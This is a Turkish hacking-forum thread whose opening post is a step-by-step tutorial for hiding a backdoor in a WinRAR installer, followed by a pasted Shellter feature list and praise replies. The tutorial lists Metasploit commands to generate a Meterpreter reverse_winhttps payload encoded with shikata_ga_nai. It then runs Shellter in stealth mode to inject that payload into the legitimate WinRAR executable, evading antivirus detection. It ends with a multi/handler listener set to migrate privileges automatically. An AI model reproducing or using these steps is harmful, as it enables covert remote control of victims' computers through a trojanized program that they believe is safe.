Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Trojan ve Virüsler

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.



rar-a backdoor gommek antiviruslardan kacirmak/cewl

Trojan ve Virüsler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 25-01-2019 19:56   #1
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Merdekan
Yaş
24
Mesajlar
Konular

Teşekkür (Etti): 0
Teşekkür (Aldı): 723


rar-a backdoor gommek antiviruslardan kacirmak/cewl






Merhaba arkadaslar nasilsiniz bu gunde bi konu acmak karari aldimki dun acacakdim amma ksimet bu gune imis arkadaslar bu konunun maksadi ise arkadaslar bacara bildiyimiz kadaryla anti virusdan kacirmak ve hedef ise ben sanmyorm rarin trojan olduqunu bilsin o uzdenden bu islemleri kali linuks arayiciliqi ile yapacaqim kalide bize yardim edecek proqram ise mettasploit olacakdir neden msfvenom diyorsanizsa o uzdenki mettasploitinde uzerinde encrypt etmeye yarayan scriptler gelmis bu gun onu kullanacagiz ilk asamadan baslayalim asagiya baya parametreler yazacaqim resmler ekleyeceyim ki anlasilmasi kolay olsun deye arkadaslar ilk once bize kali linuksa kecmek ve terminala wineni yuklemesini soylemek ' ee tamam uzerinde yuklu gelir wine amma bu proqrami shellter proqramin calisdirmaz hata veriri o uzdende terminala asagidaki parametreni girelim ve wine32 ni yukleyelim














Kod:
   sudo apt-get install wine32









cikan sonuclara bakdikda ise yuklenmediyini gormus olduq tamam hatayi atlatmamiz icin ne yapa bliriz elbetteki asagidaki 1 2 tane parametreni girerek onara bliriz arkadaslar ilk once ise











Kod:
    sudo apt-get update









soyledik ve paketleri update yani guncelleddik ardinca ise asagidaki parametreni terminala yazalim











Kod:
    dpkg  --add-architecture i386









yazarak arxitekturani yukledik ve ardinca ise asagidaki parametreye bakalim gorelim yukleye bilecekmi deye










Kod:
   sudo apt-get install wine32







yuklemeye basladi sanrim 10 15 dakikamizi ala blir arkadaslar bu yuklenme ve devam edyoruz varsayalmki yuklenme bitti amma acilmiyor wine 32 sakin kizmayin asagidaki parametreni girin










Kod:
   sudo apt-get install -f







soyledik ve gereken ve sistemde bulunmayan wine32 icin lazim olan seyleri indirmis olduq ve sorunsuz casina calisdi wine 32 eyer wine32 yazarsanizsa calismazsa wine yazin arkadaslar (: ha neymis bu wine wine kali linuksda exe dosyalarin acmaya yarayan bi proqamdir baya guzel prowramdir onuda soyleyim farkli farkli proqramlari kurmaya exe formaitndakilar kirmaya yardimci olur evet buraya gibi iyi gelyoruz o zaman baska bir aracida yukleyelim ismi ise bu proqramin Shellter dir arkadaslar bu proqram encryp islemlerinde yani trojani virustotaldan kecirmek icin iyidir gunumuzde en cok kullanilan proqramdir bunu nasilmi indirirsiniz ? asagidaki parametreleri girelm









Kod:
   sudo apt-get install shellter













yazdik ve kuruldukdan sonra ise shellter icin gerekekn proqramciklarin kurulmasi lazim o uzden ise asagidaki parametreni girelim terminala










Kod:
   sudo apt-get install -f









bunuda sorunsuzcasina indirmis olduq ardinca ise yureynizde subhe kalmasin deye terminala shellter yaza blirsiniz acildiqi durumda ise o demekdirki wine32 sorunsuzacsina kurulmusdur bunlarida koyalim 1 kenara gelelim asil meseleye arkadaslar kaliden terminali acalim ve terminala msfconsole yazalim









Kod:
   msfconsole








ardinca is egereken yollari parametreleri payload in yollarin gosterelim








Kod:
   msfconsole










Kod:
   use payload/windows/meterpreter/reverse_winhttps










Kod:
  show options










Kod:
   set lhost (ip)









Kod:
   set lport (port)









Kod:
  generate -E -e x86/shikata_ga_nai -t raw -f /root/isim







ve bir mettasploit arayiciliqi ile kali linuksa root kismina bolmune 1 virustotaldan kazmamiza yardim ede bilecek encrypt atti ve simdi ise kecelim shellere onla winrari o simid yaratmis olduqmuz ismi crypterle balayalim









Kod:
  shellter








Kod:
  wine32 shellter









Kod:
  wine shellter









Kod:
  chose operation mode --> A









Kod:
  pe Target --> /root/iorginalwinrar.exe









Kod:
  enable sthealth mode? --> Y










Kod:
  listed payload custom? --> C









Kod:
  select payload --> /root/ismi










Kod:
  payload reflecter dll list? --> N









Kod:
  use exploit/multi/handler








Kod:
  set payload/windows/meterpreter/reverse_winhttps








Kod:
 set lhost (ip)








Kod:
  set lport (port)








Kod:
  set exitonsessions false









Kod:
  set autoscript post/windows/manager/priv_migrate








Kod:
  run -j





















































































































































































































shellter hakkinda konusmak isderim shellterin kendi sitesi https://www.shellterproject.com/introducing-shellter/


Shellter, dinamik bir shellcode enjeksiyon aracıdır ve şimdiye kadar yaratılmış ilk gerçekten dinamik PE infektörüdür.
Yerel Windows uygulamalarına kabuk kodunu enjekte etmek için kullanılabilir (şu anda yalnızca 32 bit uygulamalar).
Kabuk kodu sizin ya da ****sploit gibi bir çerçeve ile oluşturulan bir şey olabilir.

Shellter, PE dosyasının orijinal yapısından yararlanır ve bölümlerde hafıza erişim izinlerinin değiştirilmesi (kullanıcı istemiyorsa), RWE erişimi ile fazladan bir bölüm eklemek ve bir AV taraması altında tehlikeli görünen herhangi bir değişiklik yapmaz .

Shellter, hedef uygulamanın yürütme akışına dayanan benzersiz bir dinamik yaklaşım kullanıyor ve bu buzdağının sadece görünen kısmı.
Shellter, yürütmeyi yüke yönlendirmek için bir talimat ekleyecek bir yer bulmaya çalışan bir EPO enfektörü değildir. Diğer herhangi bir infektörün aksine, Shellter'ın gelişmiş enfeksiyon motoru yürütme akışını hiçbir zaman bir kod mağarasına veya virüslü PE dosyasındaki ek bir bölüme aktarmaz.

Shellter Pro'da sunulan özel özellikler hakkında bilgi burada bulunabilir .

Ana Özellikler

Windows x86 / x64 (XP SP3 ve üzeri) ve Linux / Mac için Wine / CrossOver ile uyumludur.
Taşınabilir - Kurulum gerekmez.
Fazladan bağımlılık gerektirmez (python, .net, vb…).
Statik PE şablonları, çerçeve sarmalayıcıları vb…
Herhangi bir 32 bitlik yükü destekler (kullanıcı tarafından ****sploit tarafından veya özel olanlar tarafından oluşturulur).
****sploit ile yapılan her türlü kodlama ile uyumludur.
Kullanıcı tarafından oluşturulan özel kodlama ile uyumlu.
Stealth Mode - Orijinal İşlevselliği Korur.
Çok Yüklü PE enfeksiyonu.
Özel Kodlama + Kullanıcı Tanımlı Kodlama Dizisi.
Dinamik iş parçacığı içerik tuşları.
Yansıtıcı DLL yükleyicileri destekler.
Gömülü ****sploit Yükü.
Önemsiz kod Polimorfik motor.
Konu bağlamını tanıyan polimorfik motor.
Kullanıcı kendi polimorfik kodunu kullanabilir.
Anti-statik analiz için Dinamik Konu İçeriği bilgisinden yararlanır.
Kendi kendini değiştiren kodu algılar.
Tek ve çok dişli uygulamaları izler.
Uygulama akışına göre tamamen dinamik enjeksiyon yerleri.
Kullanıcının kullanabileceği enjeksiyon noktalarını söküp gösterir.
Kullanıcı neyin, ne zaman ve nerede enjekte edileceğini seçer.
Komut Satırı desteği.
Ücretsiz







tesekkure layiksa tesekur etmeyi unutmayin (:



___________________________________________

█║▌│█│║▌║││█║▌║▌║
© Copyright 2017
MERDEKAN

Konu cewl tarafından (25-01-2019 20:28 Saat 20:28 ) değiştirilmiştir..
 Online  
 
Alıntı ile Cevapla
Alt 25-01-2019 20:02   #2
  • Bilgi Teknolojileri Ekibi
  • Üye Bilgileri
Üyelik tarihi
11/2015
Nereden
/etc/passwd
Yaş
18
Mesajlar
Konular

Teşekkür (Etti): 20
Teşekkür (Aldı): 70




Eline Sağlık Cewl Yararlı Konu



___________________________________________

Uykunun En Güzel Yerinde Çalan Alarm Gibiyim.
Rüzgardan Yüzüne Gelen O Lanet Fular Gibiyim.
Sinirlenip Yumrukladığın Beyaz Duvar Gibiyim.
Sana Zarar Veririm Anlayacağın Kumar Gibiyim.
 Offline  
 
Alıntı ile Cevapla
Alt 25-01-2019 20:04   #3
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
01/2019
Nereden
Hogwarts
Mesajlar
Konular
3

Teşekkür (Etti): 8
Teşekkür (Aldı): 0




eline sağlık abi güzel bir anlatım olmuş
 Offline  
 
Alıntı ile Cevapla
Alt 25-01-2019 20:26   #4
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Merdekan
Yaş
24
Mesajlar
Konular

Teşekkür (Etti): 0
Teşekkür (Aldı): 723




cox saolun (; konya yeniden resm eklenmisdir (:



___________________________________________

█║▌│█│║▌║││█║▌║▌║
© Copyright 2017
MERDEKAN
 Online  
 
Alıntı ile Cevapla
Alt 25-01-2019 20:35   #5
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2016
Mesajlar
Konular

Teşekkür (Etti): 464
Teşekkür (Aldı): 707




Ya adam anlatmıyor yaşatıyor ya, yazıların arasına koyduğu şeyleri koyarken yorulur insan.
Üstad sen THT için çok değerlisin.



Ellerine sağlık canım kardeşim



___________________________________________

Anladıktan sonra, hiçbir şey ilginç gelmez.
▓██▓
▓██▒
▒██░
▒██░ awliet123
░██████▒
░ ▒░▓ ░
░ ░ ▒ ░
░ ░

 Offline  
 
Alıntı ile Cevapla
Alt 26-01-2019 23:14   #6
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Merdekan
Yaş
24
Mesajlar
Konular

Teşekkür (Etti): 0
Teşekkür (Aldı): 723




Alıntı:
Lawliet123´isimli üyeden Alıntı Mesajı göster
Ya adam anlatmıyor yaşatıyor ya, yazıların arasına koyduğu şeyleri koyarken yorulur insan.
Üstad sen THT için çok değerlisin.



Ellerine sağlık canım kardeşim
Cok tesekr ederim. Sen cok guzel bir insansin senin deyerlendirmen bencin zevkdir dosdum valla



___________________________________________

█║▌│█│║▌║││█║▌║▌║
© Copyright 2017
MERDEKAN
 Online  
 
Alıntı ile Cevapla
Alt 27-01-2019 14:52   #7
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 199
Teşekkür (Aldı): 893




Ellerine Sağlık Cewl Sağlam Konu Olmuş
 Offline  
 
Alıntı ile Cevapla
Alt 27-01-2019 14:54   #8
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
12/2018
Nereden
Turkey
Mesajlar
Konular

Teşekkür (Etti): 17
Teşekkür (Aldı): 25




eline saglık albayım ++++++++



___________________________________________

Ne Mutlu Türküm diyene

 Offline  
 
Alıntı ile Cevapla
Alt 27-01-2019 15:18   #9
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Merdekan
Yaş
24
Mesajlar
Konular

Teşekkür (Etti): 0
Teşekkür (Aldı): 723




Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Ellerine Sağlık Cewl Sağlam Konu Olmuş
cok tesekkur ederim guzel insan (:

Alıntı:
thesunv1´isimli üyeden Alıntı Mesajı göster
eline saglık albayım ++++++++
. ve sizede tesekkur ederim (:



___________________________________________

█║▌│█│║▌║││█║▌║▌║
© Copyright 2017
MERDEKAN
 Online  
 
Alıntı ile Cevapla
Alt 27-01-2019 17:49   #10
  • Tamamen Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
09/2017
Nereden
Tanrı Dağı
Mesajlar
Konular

Teşekkür (Etti): 18
Teşekkür (Aldı): 42




@cewl yaxsi məvzu

Məvzuyu sevdim.

Bir vakiq whatsaap'dan yazirəm

Konu Sult tarafından (27-01-2019 17:51 Saat 17:51 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Siber Güvenlik
Pomeranian Boo
instagram takipci hilesi

wau